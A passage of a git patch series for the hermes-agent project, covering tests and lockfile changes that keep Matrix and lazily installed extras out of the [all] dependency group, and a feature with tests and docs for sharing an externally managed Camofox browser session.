+++ b/tests/hermes_cli/test_gateway_platform_gating.py
@@ -0,0 +1,61 @@
+"""Host-specific gating in ``hermes_cli.gateway._all_platforms()``.
+
+Some messaging platforms can't function on every host. The gate lives
+in one place — ``_all_platforms()`` — so the setup wizard, the curses
+gateway-config menu, and any future picker all see the same filtered
+list.
+
+Currently:
+- Matrix is hidden on Windows. The ``[matrix]`` extra pulls
+  ``mautrix[encryption]`` -> ``python-olm``, which has no Windows wheel
+  and needs ``make`` + libolm to build from sdist. There's no native
+  Windows path that works.
+"""
+
+import sys
+
+
+class TestMatrixHiddenOnWindows:
+    def test_matrix_present_on_linux(self, monkeypatch):
+        """Sanity: matrix is still in the picker on Linux/macOS."""
+        import hermes_cli.gateway as gateway_mod
+
+        monkeypatch.setattr(gateway_mod.sys, "platform", "linux")
+        platforms = gateway_mod._all_platforms()
+        keys = {p["key"] for p in platforms}
+        assert "matrix" in keys, "matrix must be available on Linux"
+
+    def test_matrix_present_on_macos(self, monkeypatch):
+        import hermes_cli.gateway as gateway_mod
+
+        monkeypatch.setattr(gateway_mod.sys, "platform", "darwin")
+        platforms = gateway_mod._all_platforms()
+        keys = {p["key"] for p in platforms}
+        assert "matrix" in keys, "matrix must be available on macOS"
+
+    def test_matrix_hidden_on_windows(self, monkeypatch):
+        """The actual gate: matrix must NOT appear on Windows."""
+        import hermes_cli.gateway as gateway_mod
+
+        monkeypatch.setattr(gateway_mod.sys, "platform", "win32")
+        platforms = gateway_mod._all_platforms()
+        keys = {p["key"] for p in platforms}
+        assert "matrix" not in keys, (
+            "matrix must be hidden on Windows — python-olm has no "
+            "Windows wheel and no native build path"
+        )
+
+    def test_other_platforms_unaffected_on_windows(self, monkeypatch):
+        """Gating must only drop matrix, not collateral damage."""
+        import hermes_cli.gateway as gateway_mod
+
+        monkeypatch.setattr(gateway_mod.sys, "platform", "win32")
+        platforms = gateway_mod._all_platforms()
+        keys = {p["key"] for p in platforms}
+        # A representative sample of platforms that have no Windows
+        # blockers — picker should still surface them.
+        for must_have in ("telegram", "discord", "slack", "mattermost"):
+            assert must_have in keys, (
+                f"{must_have} disappeared from Windows picker — gate is "
+                "over-filtering"
+            )
diff --git a/tests/test_project_metadata.py b/tests/test_project_metadata.py
index 27a1002b56c..87dfc192ab7 100644
--- a/tests/test_project_metadata.py
+++ b/tests/test_project_metadata.py
@@ -11,22 +11,73 @@ def _load_optional_dependencies():
     return project["optional-dependencies"]
 
 
-def test_matrix_extra_linux_only_in_all():
-    """mautrix[encryption] depends on python-olm which is upstream-broken on
-    modern macOS (archived libolm, C++ errors with Clang 21+).  The [matrix]
-    extra is included in [all] but gated to Linux via a platform marker so
-    that ``hermes update`` doesn't fail on macOS."""
+def test_matrix_extra_not_in_all():
+    """The [matrix] extra pulls `mautrix[encryption]` -> `python-olm`,
+    which has Linux-only wheels and no native build path on Windows or
+    modern macOS (archived libolm, C++ errors with Clang 21+).
+
+    With matrix in [all], `uv sync --locked` on Windows tried to build
+    python-olm from sdist and failed on `make`. As of 2026-05-12 the
+    [matrix] extra is excluded from [all] entirely and routed through
+    `tools/lazy_deps.py` (LAZY_DEPS["platform.matrix"]) — installs at
+    first use, where the user is expected to have a toolchain.
+    """
     optional_dependencies = _load_optional_dependencies()
 
-    assert "matrix" in optional_dependencies
-    # Must NOT be unconditional — python-olm has no macOS wheels.
-    assert "hermes-agent[matrix]" not in optional_dependencies["all"]
-    # Must be present with a Linux platform marker.
-    linux_gated = [
+    assert "matrix" in optional_dependencies, "[matrix] extra must still exist for explicit `pip install hermes-agent[matrix]`"
+    # Must NOT appear in [all] in any form — neither unconditional nor
+    # platform-gated. Lazy-install handles it.
+    matrix_in_all = [
         dep for dep in optional_dependencies["all"]
-        if "matrix" in dep and "linux" in dep
+        if "matrix" in dep
     ]
-    assert linux_gated, "expected hermes-agent[matrix] with sys_platform=='linux' marker in [all]"
+    assert not matrix_in_all, (
+        "matrix must not appear in [all] — it's lazy-installed via "
+        "tools/lazy_deps.py LAZY_DEPS['platform.matrix']. Found: "
+        f"{matrix_in_all}"
+    )
+
+
+def test_lazy_installable_extras_excluded_from_all():
+    """Policy (2026-05-12): every extra that has a `LAZY_DEPS` entry
+    in `tools/lazy_deps.py` must be excluded from [all].
+
+    The lazy-install system exists so one quarantined PyPI release
+    (e.g. mistralai 2.4.6) can't break every fresh install. Putting a
+    backend in BOTH [all] and LAZY_DEPS defeats that — fresh installs
+    eager-install it and inherit whatever's broken upstream.
+
+    If you're tempted to add an opt-in backend to [all] for "convenience,"
+    add it to `LAZY_DEPS` instead so it installs at first use.
+    """
+    optional_dependencies = _load_optional_dependencies()
+
+    # Hard-coded mirror of the extras that are in LAZY_DEPS as of
+    # 2026-05-12. This list intentionally duplicates rather than
+    # imports tools/lazy_deps.py so the test stays a contract — if
+    # someone adds a new lazy-install backend, they have to update
+    # this list AND verify [all] doesn't contain it.
+    lazy_covered_extras = {
+        "anthropic", "bedrock",
+        "exa", "firecrawl", "parallel-web",
+        "fal",
+        "edge-tts", "tts-premium",
+        "voice",  # faster-whisper / sounddevice / numpy
+        "modal", "daytona", "vercel",
+        "messaging", "slack", "matrix", "dingtalk", "feishu",
+        "honcho", "hindsight",
+    }
+    all_extra_specs = optional_dependencies["all"]
+    for extra in lazy_covered_extras:
+        offending = [
+            spec for spec in all_extra_specs
+            if f"hermes-agent[{extra}]" in spec
+        ]
+        assert not offending, (
+            f"[{extra}] is in [all] but also in LAZY_DEPS. "
+            f"Remove it from [all] in pyproject.toml — it lazy-installs "
+            f"at first use. Found in [all]: {offending}"
+        )
 
 
 def test_messaging_extra_includes_qrcode_for_weixin_setup():
diff --git a/uv.lock b/uv.lock
index 5051fdf0727..713cd588fd6 100644
--- a/uv.lock
+++ b/uv.lock
@@ -1978,50 +1978,22 @@ acp = [
 all = [
     { name = "agent-client-protocol" },
     { name = "aiohttp" },
-    { name = "aiohttp-socks", marker = "sys_platform == 'linux'" },
-    { name = "aiosqlite", marker = "sys_platform == 'linux'" },
-    { name = "alibabacloud-dingtalk" },
-    { name = "anthropic" },
-    { name = "asyncpg", marker = "sys_platform == 'linux'" },
-    { name = "boto3" },
-    { name = "daytona" },
     { name = "debugpy" },
-    { name = "dingtalk-stream" },
-    { name = "discord-py", extra = ["voice"] },
-    { name = "edge-tts" },
-    { name = "elevenlabs" },
-    { name = "exa-py" },
-    { name = "fal-client" },
     { name = "fastapi" },
-    { name = "faster-whisper" },
-    { name = "firecrawl-py" },
     { name = "google-api-python-client" },
     { name = "google-auth-httplib2" },
     { name = "google-auth-oauthlib" },
-    { name = "honcho-ai" },
-    { name = "lark-oapi" },
-    { name = "markdown", marker = "sys_platform == 'linux'" },
-    { name = "mautrix", extra = ["encryption"], marker = "sys_platform == 'linux'" },
     { name = "mcp" },
-    { name = "modal" },
-    { name = "numpy" },
-    { name = "parallel-web" },
     { name = "ptyprocess", marker = "sys_platform != 'win32'" },
     { name = "pytest" },
     { name = "pytest-asyncio" },
     { name = "pytest-split" },
     { name = "pytest-xdist" },
-    { name = "python-telegram-bot", extra = ["webhooks"] },
     { name = "pywinpty", marker = "sys_platform == 'win32'" },
-    { name = "qrcode" },
     { name = "ruff" },
     { name = "simple-term-menu" },
-    { name = "slack-bolt" },
-    { name = "slack-sdk" },
-    { name = "sounddevice" },
     { name = "ty" },
     { name = "uvicorn", extra = ["standard"] },
-    { name = "vercel" },
     { name = "youtube-transcript-api" },
 ]
 anthropic = [
@@ -2138,25 +2110,16 @@ termux = [
 termux-all = [
     { name = "agent-client-protocol" },
     { name = "aiohttp" },
-    { name = "alibabacloud-dingtalk" },
-    { name = "boto3" },
-    { name = "dingtalk-stream" },
-    { name = "discord-py", extra = ["voice"] },
-    { name = "elevenlabs" },
     { name = "fastapi" },
     { name = "google-api-python-client" },
     { name = "google-auth-httplib2" },
     { name = "google-auth-oauthlib" },
     { name = "honcho-ai" },
-    { name = "lark-oapi" },
     { name = "mcp" },
     { name = "ptyprocess", marker = "sys_platform != 'win32'" },
     { name = "python-telegram-bot", extra = ["webhooks"] },
     { name = "pywinpty", marker = "sys_platform == 'win32'" },
-    { name = "qrcode" },
     { name = "simple-term-menu" },
-    { name = "slack-bolt" },
-    { name = "slack-sdk" },
     { name = "uvicorn", extra = ["standard"] },
 ]
 tts-premium = [
@@ -2213,47 +2176,23 @@ requires-dist = [
     { name = "google-auth-oauthlib", marker = "extra == 'google'", specifier = "==1.3.1" },
     { name = "hermes-agent", extras = ["acp"], marker = "extra == 'all'" },
     { name = "hermes-agent", extras = ["acp"], marker = "extra == 'termux'" },
-    { name = "hermes-agent", extras = ["anthropic"], marker = "extra == 'all'" },
-    { name = "hermes-agent", extras = ["bedrock"], marker = "extra == 'all'" },
-    { name = "hermes-agent", extras = ["bedrock"], marker = "extra == 'termux-all'" },
     { name = "hermes-agent", extras = ["cli"], marker = "extra == 'all'" },
     { name = "hermes-agent", extras = ["cli"], marker = "extra == 'termux'" },
     { name = "hermes-agent", extras = ["cron"], marker = "extra == 'all'" },
     { name = "hermes-agent", extras = ["cron"], marker = "extra == 'termux'" },
-    { name = "hermes-agent", extras = ["daytona"], marker = "extra == 'all'" },
     { name = "hermes-agent", extras = ["dev"], marker = "extra == 'all'" },
-    { name = "hermes-agent", extras = ["dingtalk"], marker = "extra == 'all'" },
-    { name = "hermes-agent", extras = ["dingtalk"], marker = "extra == 'termux-all'" },
-    { name = "hermes-agent", extras = ["edge-tts"], marker = "extra == 'all'" },
-    { name = "hermes-agent", extras = ["exa"], marker = "extra == 'all'" },
-    { name = "hermes-agent", extras = ["fal"], marker = "extra == 'all'" },
-    { name = "hermes-agent", extras = ["feishu"], marker = "extra == 'all'" },
-    { name = "hermes-agent", extras = ["feishu"], marker = "extra == 'termux-all'" },
-    { name = "hermes-agent", extras = ["firecrawl"], marker = "extra == 'all'" },
     { name = "hermes-agent", extras = ["google"], marker = "extra == 'all'" },
     { name = "hermes-agent", extras = ["google"], marker = "extra == 'termux-all'" },
     { name = "hermes-agent", extras = ["homeassistant"], marker = "extra == 'all'" },
     { name = "hermes-agent", extras = ["homeassistant"], marker = "extra == 'termux-all'" },
-    { name = "hermes-agent", extras = ["honcho"], marker = "extra == 'all'" },
     { name = "hermes-agent", extras = ["honcho"], marker = "extra == 'termux'" },
-    { name = "hermes-agent", extras = ["matrix"], marker = "sys_platform == 'linux' and extra == 'all'" },
     { name = "hermes-agent", extras = ["mcp"], marker = "extra == 'all'" },
     { name = "hermes-agent", extras = ["mcp"], marker = "extra == 'termux'" },
-    { name = "hermes-agent", extras = ["messaging"], marker = "extra == 'all'" },
-    { name = "hermes-agent", extras = ["messaging"], marker = "extra == 'termux-all'" },
-    { name = "hermes-agent", extras = ["modal"], marker = "extra == 'all'" },
-    { name = "hermes-agent", extras = ["parallel-web"], marker = "extra == 'all'" },
     { name = "hermes-agent", extras = ["pty"], marker = "extra == 'all'" },
     { name = "hermes-agent", extras = ["pty"], marker = "extra == 'termux'" },
-    { name = "hermes-agent", extras = ["slack"], marker = "extra == 'all'" },
-    { name = "hermes-agent", extras = ["slack"], marker = "extra == 'termux-all'" },
     { name = "hermes-agent", extras = ["sms"], marker = "extra == 'all'" },
     { name = "hermes-agent", extras = ["sms"], marker = "extra == 'termux-all'" },
     { name = "hermes-agent", extras = ["termux"], marker = "extra == 'termux-all'" },
-    { name = "hermes-agent", extras = ["tts-premium"], marker = "extra == 'all'" },
-    { name = "hermes-agent", extras = ["tts-premium"], marker = "extra == 'termux-all'" },
-    { name = "hermes-agent", extras = ["vercel"], marker = "extra == 'all'" },
-    { name = "hermes-agent", extras = ["voice"], marker = "extra == 'all'" },
     { name = "hermes-agent", extras = ["web"], marker = "extra == 'all'" },
     { name = "hermes-agent", extras = ["web"], marker = "extra == 'termux-all'" },
     { name = "hermes-agent", extras = ["youtube"], marker = "extra == 'all'" },

From 62fd905340969deb5fd914c623e4d1ab99dba8b0 Mon Sep 17 00:00:00 2001
From: Dan Benyamin <db@project-aeon.com>
Date: Sun, 10 May 2026 17:54:13 -0700
Subject: [PATCH 25/59] feat(browser): support externally managed Camofox
 sessions

Allow integrations to share a visible Camofox identity with Hermes and recover existing tabs without carrying local patches.

Co-authored-by: Cursor <cursoragent@cursor.com>
---
 hermes_cli/config.py                          |   6 +
 .../tools/test_browser_camofox_persistence.py | 112 +++++++++++++++++
 tests/tools/test_browser_camofox_state.py     |   5 +-
 tools/browser_camofox.py                      | 114 ++++++++++++++++--
 .../docs/reference/environment-variables.md   |   3 +
 website/docs/user-guide/configuration.md      |   3 +
 website/docs/user-guide/features/browser.md   |  22 ++++
 7 files changed, 255 insertions(+), 10 deletions(-)

diff --git a/hermes_cli/config.py b/hermes_cli/config.py
index c7946872bf2..6b981824279 100644
--- a/hermes_cli/config.py
+++ b/hermes_cli/config.py
@@ -628,6 +628,12 @@ DEFAULT_CONFIG = {
             # so the server maps it to a persistent Firefox profile automatically.
             # When false (default), each session gets a random userId (ephemeral).
             "managed_persistence": False,
+            # Optional externally managed Camofox identity. Useful when another
+            # app owns the visible browser and Hermes should operate in it.
+            "user_id": "",
+            "session_key": "",
+            # Rehydrate tab_id from Camofox before creating a new tab.
+            "adopt_existing_tab": False,
         },
     },
 
diff --git a/tests/tools/test_browser_camofox_persistence.py b/tests/tools/test_browser_camofox_persistence.py
index eddd36f0047..ff5624ca031 100644
--- a/tests/tools/test_browser_camofox_persistence.py
+++ b/tests/tools/test_browser_camofox_persistence.py
@@ -193,6 +193,118 @@ class TestManagedPersistenceMode:
         assert tab_requests[0]["userId"] == tab_requests[1]["userId"]
 
 
+class TestConfiguredCamofoxIdentity:
+    """Externally managed Camofox sessions can provide their own identity."""
+
+    def test_env_identity_overrides_default_identity(self, tmp_path, monkeypatch):
+        monkeypatch.setenv("HERMES_HOME", str(tmp_path))
+        monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
+        monkeypatch.setenv("CAMOFOX_USER_ID", "shared-camofox")
+        monkeypatch.setenv("CAMOFOX_SESSION_KEY", "visible-tab")
+        monkeypatch.setenv("CAMOFOX_ADOPT_EXISTING_TAB", "true")
+
+        with patch("tools.browser_camofox._get", return_value={"tabs": []}) as mock_get:
+            session = _get_session("task-1")
+
+        assert session["user_id"] == "shared-camofox"
+        assert session["session_key"] == "visible-tab"
+        assert session["managed"] is True
+        assert session["adopt_existing_tab"] is True
+        mock_get.assert_called_once_with(
+            "/tabs",
+            params={"userId": "shared-camofox"},
+            timeout=5,
+        )
+
+    def test_config_identity_is_used_when_env_is_absent(self, tmp_path, monkeypatch):
+        monkeypatch.setenv("HERMES_HOME", str(tmp_path))
+        monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
+        config = {
+            "browser": {
+                "camofox": {
+                    "user_id": "config-user",
+                    "session_key": "config-session",
+                    "adopt_existing_tab": False,
+                }
+            }
+        }
+
+        with patch("tools.browser_camofox.load_config", return_value=config):
+            session = _get_session("task-1")
+
+        assert session["user_id"] == "config-user"
+        assert session["session_key"] == "config-session"
+        assert session["adopt_existing_tab"] is False
+
+    def test_env_identity_takes_precedence_over_config(self, tmp_path, monkeypatch):
+        monkeypatch.setenv("HERMES_HOME", str(tmp_path))
+        monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
+        monkeypatch.setenv("CAMOFOX_USER_ID", "env-user")
+        monkeypatch.setenv("CAMOFOX_SESSION_KEY", "env-session")
+        monkeypatch.setenv("CAMOFOX_ADOPT_EXISTING_TAB", "false")
+        config = {
+            "browser": {
+                "camofox": {
+                    "user_id": "config-user",
+                    "session_key": "config-session",
+                    "adopt_existing_tab": True,
+                }
+            }
+        }
+
+        with patch("tools.browser_camofox.load_config", return_value=config):
+            session = _get_session("task-1")
+
+        assert session["user_id"] == "env-user"
+        assert session["session_key"] == "env-session"
+        assert session["adopt_existing_tab"] is False
+
+    def test_adopts_existing_tab_matching_session_key(self, tmp_path, monkeypatch):
+        monkeypatch.setenv("HERMES_HOME", str(tmp_path))
+        monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
+        monkeypatch.setenv("CAMOFOX_USER_ID", "shared-camofox")
+        monkeypatch.setenv("CAMOFOX_SESSION_KEY", "visible-tab")
+        monkeypatch.setenv("CAMOFOX_ADOPT_EXISTING_TAB", "true")
+        tabs = {
+            "tabs": [
+                {"tabId": "tab-other", "listItemId": "other"},
+                {"tabId": "tab-visible", "listItemId": "visible-tab"},
+            ]
+        }
+
+        with patch("tools.browser_camofox._get", return_value=tabs):
+            session = _get_session("task-1")
+
+        assert session["tab_id"] == "tab-visible"
+
+    def test_managed_persistence_can_opt_into_tab_adoption(self, tmp_path, monkeypatch):
+        monkeypatch.setenv("HERMES_HOME", str(tmp_path))
+        monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
+        config = {"browser": {"camofox": {"managed_persistence": True, "adopt_existing_tab": True}}}
+
+        with (
+            patch("tools.browser_camofox.load_config", return_value=config),
+            patch("tools.browser_camofox._get", return_value={"tabs": [{"tabId": "tab-1"}]}),
+        ):
+            session = _get_session("task-1")
+
+        assert session["tab_id"] == "tab-1"
+
+    def test_soft_cleanup_preserves_externally_managed_session(self, tmp_path, monkeypatch):
+        monkeypatch.setenv("HERMES_HOME", str(tmp_path))
+        monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
+        monkeypatch.setenv("CAMOFOX_USER_ID", "shared-camofox")
+
+        with patch("tools.browser_camofox._get", return_value={"tabs": []}):
+            _get_session("task-1")
+        result = camofox_soft_cleanup("task-1")
+
+        assert result is True
+        import tools.browser_camofox as mod
+        with mod._sessions_lock:
+            assert "task-1" not in mod._sessions
+
+
 class TestVncUrlDiscovery:
     """VNC URL is derived from the Camofox health endpoint."""
 
diff --git a/tests/tools/test_browser_camofox_state.py b/tests/tools/test_browser_camofox_state.py
index 9ce3d132028..f0e632ad5f6 100644
--- a/tests/tools/test_browser_camofox_state.py
+++ b/tests/tools/test_browser_camofox_state.py
@@ -53,8 +53,11 @@ class TestCamofoxIdentity:
 
 
 class TestCamofoxConfigDefaults:
-    def test_default_config_includes_managed_persistence_toggle(self):
+    def test_default_config_includes_camofox_controls(self):
         from hermes_cli.config import DEFAULT_CONFIG
 
         browser_cfg = DEFAULT_CONFIG["browser"]
         assert browser_cfg["camofox"]["managed_persistence"] is False
+        assert browser_cfg["camofox"]["user_id"] == ""
+        assert browser_cfg["camofox"]["session_key"] == ""
+        assert browser_cfg["camofox"]["adopt_existing_tab"] is False
diff --git a/tools/browser_camofox.py b/tools/browser_camofox.py
index 5f59dd913ff..071f1a2164b 100644
--- a/tools/browser_camofox.py
+++ b/tools/browser_camofox.py
@@ -98,6 +98,16 @@ def get_vnc_url() -> Optional[str]:
     return _vnc_url
 
 
+def _get_camofox_config() -> Dict[str, Any]:
+    """Return the ``browser.camofox`` config block, or an empty dict."""
+    try:
+        camofox_cfg = load_config().get("browser", {}).get("camofox", {})
+    except Exception as exc:
+        logger.warning("camofox config check failed, defaulting to disabled: %s", exc)
+        return {}
+    return camofox_cfg if isinstance(camofox_cfg, dict) else {}
+
+
 def _managed_persistence_enabled() -> bool:
     """Return whether Hermes-managed persistence is enabled for Camofox.
 
@@ -107,12 +117,46 @@ def _managed_persistence_enabled() -> bool:
 
     Controlled by ``browser.camofox.managed_persistence`` in config.yaml.
     """
-    try:
-        camofox_cfg = load_config().get("browser", {}).get("camofox", {})
-    except Exception as exc:
-        logger.warning("managed_persistence check failed, defaulting to disabled: %s", exc)
+    return bool(_get_camofox_config().get("managed_persistence"))
+
+
+def _camofox_identity_override(task_id: Optional[str], camofox_cfg: Dict[str, Any]) -> Optional[Dict[str, str]]:
+    """Return an externally configured Camofox identity, if one is set.
+
+    Integrations that own the visible Camofox browser can set a shared user ID
+    so Hermes operates in the same browser profile instead of creating a
+    separate private session.
+    """
+    user_id = os.getenv("CAMOFOX_USER_ID", "").strip() or str(camofox_cfg.get("user_id") or "").strip()
+    if not user_id:
+        return None
+
+    session_key = (
+        os.getenv("CAMOFOX_SESSION_KEY", "").strip()
+        or str(camofox_cfg.get("session_key") or "").strip()
+        or f"task_{(task_id or 'default')[:16]}"
+    )
+    return {"user_id": user_id, "session_key": session_key}
+
+
+def _env_flag(name: str) -> Optional[bool]:
+    raw = os.getenv(name, "").strip().lower()
+    if not raw:
+        return None
+    if raw in {"1", "true", "yes", "on"}:
+        return True
+    if raw in {"0", "false", "no", "off"}:
         return False
-    return bool(camofox_cfg.get("managed_persistence"))
+    logger.debug("Ignoring invalid boolean env %s=%r", name, raw)
+    return None
+
+
+def _adopt_existing_tab_enabled(camofox_cfg: Dict[str, Any]) -> bool:
+    """Return whether Hermes should recover an existing Camofox tab ID."""
+    env_value = _env_flag("CAMOFOX_ADOPT_EXISTING_TAB")
+    if env_value is not None:
+        return env_value
+    return bool(camofox_cfg.get("adopt_existing_tab"))
 
 
 # ---------------------------------------------------------------------------
@@ -123,6 +167,44 @@ _sessions: Dict[str, Dict[str, Any]] = {}
 _sessions_lock = threading.Lock()
 
 
+def _adopt_existing_tab(session: Dict[str, Any]) -> Dict[str, Any]:
+    """Attach process-local state to an already-open managed Camofox tab.
+
+    Some integrations own the visible Camofox tab outside Hermes. Gateway
+    restarts can leave this module's in-memory session cache empty even though
+    Camofox still has that tab, so rehydrate tab_id before creating a new tab.
+    """
+    if session.get("tab_id") or not session.get("adopt_existing_tab"):
+        return session
+
+    if not get_camofox_url():
+        return session
+
+    try:
+        tabs = _get("/tabs", params={"userId": session["user_id"]}, timeout=5).get("tabs", [])
+    except Exception as exc:
+        logger.debug("Camofox tab adoption failed for %s: %s", session.get("user_id"), exc)
+        return session
+
+    if not isinstance(tabs, list) or not tabs:
+        return session
+
+    session_key = session.get("session_key")
+    matching_tabs = [
+        tab
+        for tab in tabs
+        if isinstance(tab, dict) and tab.get("listItemId") == session_key
+    ]
+    candidates = matching_tabs or [tab for tab in tabs if isinstance(tab, dict)]
+    latest = candidates[-1] if candidates else None
+    tab_id = latest.get("tabId") if isinstance(latest, dict) else None
+    if isinstance(tab_id, str) and tab_id:
+        session["tab_id"] = tab_id
+        logger.debug("Adopted existing Camofox tab %s for %s", tab_id, session.get("user_id"))
+
+    return session
+
+
 def _get_session(task_id: Optional[str]) -> Dict[str, Any]:
     """Get or create a camofox session for the given task.
 
@@ -133,14 +215,26 @@ def _get_session(task_id: Optional[str]) -> Dict[str, Any]:
     task_id = task_id or "default"
     with _sessions_lock:
         if task_id in _sessions:
-            return _sessions[task_id]
-        if _managed_persistence_enabled():
+            return _adopt_existing_tab(_sessions[task_id])
+
+        camofox_cfg = _get_camofox_config()
+        identity_override = _camofox_identity_override(task_id, camofox_cfg)
+        if identity_override:
+            session = {
+                "user_id": identity_override["user_id"],
+                "tab_id": None,
+                "session_key": identity_override["session_key"],
+                "managed": True,
+                "adopt_existing_tab": _adopt_existing_tab_enabled(camofox_cfg),
+            }
+        elif bool(camofox_cfg.get("managed_persistence")):
             identity = get_camofox_identity(task_id)
             session = {
                 "user_id": identity["user_id"],
                 "tab_id": None,
                 "session_key": identity["session_key"],
                 "managed": True,
+                "adopt_existing_tab": _adopt_existing_tab_enabled(camofox_cfg),
             }
         else:
             session = {
@@ -148,9 +242,10 @@ def _get_session(task_id: Optional[str]) -> Dict[str, Any]:
                 "tab_id": None,
                 "session_key": f"task_{task_id[:16]}",
                 "managed": False,
+                "adopt_existing_tab": False,
             }
         _sessions[task_id] = session
-        return session
+        return _adopt_existing_tab(session)
 
 
 def _ensure_tab(task_id: Optional[str], url: str = "about:blank") -> Dict[str, Any]:
@@ -190,7 +285,8 @@ def camofox_soft_cleanup(task_id: Optional[str] = None) -> bool:
     does nothing and returns ``False`` so the caller can fall back to
     :func:`camofox_close`.
     """
-    if _managed_persistence_enabled():
+    camofox_cfg = _get_camofox_config()
+    if bool(camofox_cfg.get("managed_persistence")) or _camofox_identity_override(task_id, camofox_cfg):
         _drop_session(task_id)
         logger.debug("Camofox soft cleanup for task %s (managed persistence)", task_id)
         return True
diff --git a/website/docs/reference/environment-variables.md b/website/docs/reference/environment-variables.md
index eda0c2863a7..b17036ade44 100644
--- a/website/docs/reference/environment-variables.md
+++ b/website/docs/reference/environment-variables.md
@@ -129,6 +129,9 @@ For native Anthropic auth, Hermes prefers Claude Code's own credential files whe
 | `FIRECRAWL_BROWSER_TTL` | Firecrawl browser session TTL in seconds (default: 300) |
 | `BROWSER_CDP_URL` | Chrome DevTools Protocol URL for local browser (set via `/browser connect`, e.g. `ws://localhost:9222`) |
 | `CAMOFOX_URL` | Camofox local anti-detection browser URL (default: `http://localhost:9377`) |
+| `CAMOFOX_USER_ID` | Optional externally managed Camofox user ID for shared visible sessions |
+| `CAMOFOX_SESSION_KEY` | Optional Camofox session key used when creating tabs for `CAMOFOX_USER_ID` |
+| `CAMOFOX_ADOPT_EXISTING_TAB` | Set to `true` to reuse an existing Camofox tab before creating a new one |
 | `BROWSER_INACTIVITY_TIMEOUT` | Browser session inactivity timeout in seconds |
 | `FAL_KEY` | Image generation ([fal.ai](https://fal.ai/)) |
 | `GROQ_API_KEY` | Groq Whisper STT API key ([groq.com](https://groq.com/)) |
diff --git a/website/docs/user-guide/configuration.md b/website/docs/user-guide/configuration.md
index 14f80d4d97a..5ea0c0b1779 100644
--- a/website/docs/user-guide/configuration.md
+++ b/website/docs/user-guide/configuration.md
@@ -1530,6 +1530,9 @@ browser:
   dialog_timeout_s: 300          # Safety auto-dismiss under must_respond (seconds)
   camofox:
     managed_persistence: false   # When true, Camofox sessions persist cookies/logins across restarts
+    user_id: ""                  # Optional externally managed Camofox userId
+    session_key: ""              # Optional session key sent when Hermes creates a tab
+    adopt_existing_tab: false    # Reuse an existing tab for this identity before creating one
 ```
 
 **Dialog policies:**
diff --git a/website/docs/user-guide/features/browser.md b/website/docs/user-guide/features/browser.md
index 2ae5e2b5aa4..d917363df8a 100644
--- a/website/docs/user-guide/features/browser.md
+++ b/website/docs/user-guide/features/browser.md
@@ -235,6 +235,28 @@ If step 5 logs you out, the Camofox server isn't honoring the stable `userId`. D
 
 Hermes derives the stable `userId` from the profile-scoped directory `~/.hermes/browser_auth/camofox/` (or the equivalent under `$HERMES_HOME` for non-default profiles). The actual browser profile data lives on the Camofox server side, keyed by that `userId`. To fully reset a persistent profile, clear it on the Camofox server and remove the corresponding Hermes profile's state directory.
 
+#### Externally managed Camofox sessions
+
+If another app owns the visible Camofox browser, configure Hermes to use that same Camofox identity:
+
+```yaml
+browser:
+  camofox:
+    user_id: shared-camofox
+    session_key: visible-tab
+    adopt_existing_tab: true
+```
+
+You can also set the equivalent environment variables:
+
+```bash
+CAMOFOX_USER_ID=shared-camofox
+CAMOFOX_SESSION_KEY=visible-tab
+CAMOFOX_ADOPT_EXISTING_TAB=true
+```
+
+When `user_id` is set, Hermes treats the Camofox session as externally managed and skips destructive cleanup. Set `adopt_existing_tab` when gateway restarts should recover the already-open tab before creating a new one.
+
 #### VNC live view
 
 When Camofox runs in headed mode (with a visible browser window), it exposes a VNC port in its health check response. Hermes automatically discovers this and includes the VNC URL in navigation responses, so the agent can share a link for you to watch the browser live.

From f63d520496f647d652e232e60bc2de5d404cc46d Mon Sep 17 00:00:00 2001
From: Teknium <127238744+teknium1@users.noreply.github.com>
Date: Tue, 12 May 2026 11:50:33 -0700
Subject: [PATCH 26/59] chore(camofox): document new env vars + AUTHOR_MAP
 entry

Follow-up to externally managed Camofox session support:
- .env.example: document CAMOFOX_URL plus the new CAMOFOX_USER_ID,
  CAMOFOX_SESSION_KEY, CAMOFOX_ADOPT_EXISTING_TAB env vars.
- scripts/release.py: AUTHOR_MAP entry for db@project-aeon.com -> db-aeon.
---
 .env.example       | 14 ++++++++++++++
 scripts/release.py |  1 +
 2 files changed, 15 insertions(+)

diff --git a/.env.example b/.env.example
index 6dfcbdcc612..e6763f18fd2 100644
--- a/.env.example
+++ b/.env.example
@@ -273,6 +273,20 @@ BROWSER_SESSION_TIMEOUT=300
 # Browser sessions are automatically closed after this period of no activity
 BROWSER_INACTIVITY_TIMEOUT=120
 
+# Camofox local anti-detection browser (Camoufox-based Firefox).
+# Set CAMOFOX_URL to route the browser tools through a local Camofox server
+# instead of agent-browser/Browserbase. See docs/user-guide/features/browser.md.
+# CAMOFOX_URL=http://localhost:9377
+
+# Externally managed Camofox sessions — when another app owns the visible
+# Camofox browser, set these so Hermes shares the same userId/profile instead
+# of creating its own isolated session.
+# CAMOFOX_USER_ID=
+# CAMOFOX_SESSION_KEY=
+# Set to true to reuse an already-open Camofox tab for this identity before
+# creating a new one (useful for gateway restarts).
+# CAMOFOX_ADOPT_EXISTING_TAB=false
+
 # =============================================================================
 # SESSION LOGGING
 # =============================================================================
diff --git a/scripts/release.py b/scripts/release.py
index 04be23e4561..3a1a5c143cd 100755
--- a/scripts/release.py
+++ b/scripts/release.py
@@ -53,6 +53,7 @@ AUTHOR_MAP = {
     "421774554@qq.com": "wuli666",
     "harish.kukreja@gmail.com": "counterposition",
     "1046611633@qq.com": "zhengyn0001",
+    "db@project-aeon.com": "db-aeon",
     "ahmed@abadr.net": "ahmedbadr3",
     "cleo@edaphic.xyz": "curiouscleo",
     "hirokazu.ogawa@kwansei.ac.jp": "hrkzogw",

From 38441a7d776f116347ee0752368a643817ba3a85 Mon Sep 17 00:00:00 2001
From: Teknium <127238744+teknium1@users.noreply.github.com>
Date: Tue, 12 May 2026 15:20:42 -0700
Subject: [PATCH 27/59] docs(camofox): expand externally-managed sessions
 section (#24584)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Adds behavior detail to the existing 'Externally managed Camofox sessions'
subsection in features/browser.md:

- Three-row settings table (config key + env var + effect).
